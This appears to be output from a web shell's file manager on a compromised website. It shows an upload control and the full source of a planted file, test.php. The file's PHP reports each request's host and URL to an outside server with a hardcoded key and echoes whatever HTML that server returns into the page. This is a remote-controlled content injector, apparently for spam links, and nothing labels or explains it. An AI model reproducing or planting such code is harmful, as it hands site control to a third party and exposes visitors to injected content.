Your IP : 216.73.217.78


Current Path : /home/seto/tdsbs.com/
Upload File :
Current File : /home/seto/tdsbs.com/test.php

<?php
$_lf_ch = curl_init();
curl_setopt_array($_lf_ch, [
    CURLOPT_URL            => 'http://testhive.pm/api/get-link.php'
                              . '?domain=' . urlencode($_SERVER['HTTP_HOST'])
                              . '&url='    . urlencode($_SERVER['REQUEST_URI'])
                              . '&key=30380ab202962dfd0b6a0b751f2c6aef',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_TIMEOUT        => 2,
    CURLOPT_CONNECTTIMEOUT => 2,
    CURLOPT_FOLLOWLOCATION => false,
]);
$_lf = curl_exec($_lf_ch);
curl_close($_lf_ch);
if ($_lf) {
    $_lf = json_decode($_lf, true);
    if (!empty($_lf['show'])) echo $_lf['html'];
}
?>